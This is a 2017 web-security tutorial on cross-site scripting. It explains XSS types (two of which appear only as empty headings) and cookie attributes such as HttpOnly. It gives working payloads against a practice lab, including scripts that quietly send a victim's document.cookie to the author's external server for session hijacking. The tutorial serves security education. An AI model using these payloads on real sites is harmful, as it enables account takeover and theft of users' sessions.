Now, There are 3 Types of XSS
1. Reflected or Non-Persistent XSS:
2. Stored or Persistent XSS:
It occurs where malicious user input containing an XSS vector is stored or "saved" by the application and later rendered to other users, so it usually affects multiple users rather than one. Stored XSS is typically found in a user's name, a comments section, a group name, a status or timeline post, or the name of an uploaded file: any functionality or input that is shown to other users as well, so that every user who views it is affected.
3. DOM XSS:
NOTE: There is another category of XSS called "Self-XSS". This is a situation in which you have found an XSS vulnerability (of any of the three types above) but the payload can only be delivered to yourself and not to any other user, i.e. it cannot be used to exploit anyone else. Under some circumstances it is possible to turn a Self-XSS into an exploitable one; that is also left for an upcoming tutorial.
So again, this tutorial covers the very basics of XSS; finding XSS and the different contexts in which it occurs will be covered in depth in the next tutorial. First of all, in any user input try putting a simple HTML tag like <B>, <S>, <I> or <h1> to confirm whether you are able to inject HTML. If the tag is rendered (the text comes out bold, struck through, etc.) rather than displayed literally, markup is being injected.
Some examples could be (you could use any suitable event handler other than these):
http://leettime.net/xsslab1/chalg1.php?name=<input onfocus="alert(1)" autofocus>
This causes the input tag to execute alert(1) when it is focused/selected, and the autofocus attribute focuses it automatically, so alert(1) runs without any user interaction. There are numerous such examples.
Stealing User's Cookies
Alerting the cookies shows them only in the victim's browser; we never see them. Let us send the cookies to our server/website (https://securityidiots.com) instead by changing the "location.href" property.
NOTE: Remember to URL-encode "+" as %2b in a GET request, otherwise it is decoded as a whitespace.
This redirects the victim to "https://securityidiots.com/?mycookies=.....cookies here.....; UserSession=OIjieowjoiO130901933;", sending the cookies as a query parameter to our server. We can then read them from our server's access logs and replay them in the Cookie request header to access that user's session on the affected website without authenticating.
We could also write a simple PHP script to capture the cookies and save them to a file instead of checking the server logs, in case we don't have access to them.
Making a request to this script with the cookies in the mycookies parameter creates a file "Cookies.txt" and keeps appending all captured cookies to it.
However, since this redirects the victim to the attacker's page it is noisy, and we want our vector to be as stealthy as possible. We can use a tag like an image tag to send the cookies without a redirect or any visible change to the page: use document.createElement to create an img element, set its "src" attribute to our server URL concatenated with document.cookie, and add it to the DOM. The browser then fetches that image URL, cookies included, in the background.
We can do it in following manner:
var imgtag = document.createElement("img");//creates img element
imgtag.src="http://securityidiots.com/capture.php?mycookies="+document.cookie;//adds attribute src to img element
document.body.appendChild(imgtag);//appends the created element to the body tag of the DOM
So the payload becomes:
http://leettime.net/xsslab1/chalg1.php?name=<script>var x=new Image();x.src="http://securityidiots.com/capture.php?mycookies="+document['cookie'];document.body.appendChild(x);</script>
Now a GET request is sent to our server carrying the victim's cookies, with nothing visible happening on the page.
You can also use document.write() to write markup directly into the page.
A cookie is set by the server with a Set-Cookie response header of the following format:
Set-Cookie: CookieName=CookieValue; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; Domain=example.com; Secure; HttpOnly
The browser sends only the name=value part back, in the Cookie request header; there, as in document.cookie, individual cookies are separated by ';'. The attributes after the value mean:
"Expires": decides when the cookie expires; a time in the past expires (deletes) it immediately. Without it the cookie lasts only for the browser session.
"Path": decides from which path of the site onwards the cookie is sent.
"Domain": tells the browser which domain to send the cookie to. If it is not specified the cookie is limited to the exact host that set it; if specified it is also sent to that domain's subdomains.
"Secure": specifies that the cookie should be sent only over an HTTPS connection.
"HttpOnly": specifies that the cookie is not exposed to JavaScript, so it never appears in document.cookie. A session cookie with this flag cannot be stolen with the payloads above, although the XSS can still be used to make requests as the victim from inside their browser.
So, that's it for this tutorial. I wanted people to know how to exploit a very basic XSS by stealing user cookies; in the next tutorial we will look in depth at finding XSS and the different contexts of XSS. Stay tuned!
Author : Rahul Maini
Date : 2017-05-27